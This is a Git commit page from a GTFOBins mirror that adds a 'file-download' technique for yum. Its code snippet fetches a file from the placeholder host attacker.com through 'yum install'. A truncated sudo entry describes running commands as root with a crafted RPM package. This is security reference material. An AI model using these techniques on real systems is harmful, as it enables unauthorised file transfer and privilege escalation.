1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-05-24 16:26:01 +02:00

Add file-download to yum

This commit is contained in:
Roman Mueller 2020-10-02 20:22:06 +02:00 committed by GitHub
parent 1a5b396744
commit b8dc2aa817
Signed by: GitHub
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -1,5 +1,11 @@
---
functions:
file-download:
- description: Fetch a remote file via HTTP GET request. The file on the remote host must have an extension of `.rpm`, the content does not have to be an RPM file. The file will be downloaded to a randomly created directory in `/var/tmp`, for example `/var/tmp/yum-root-cR0O4h/`.
code: |
RHOST=attacker.com
RFILE=file_to_get.rpm
yum install http://$RHOST/$RFILE
sudo:
- description: |
It runs commands using a specially crafted RPM package. Generate it with [fpm](https://github.com/jordansissel/fpm) and upload it to the target.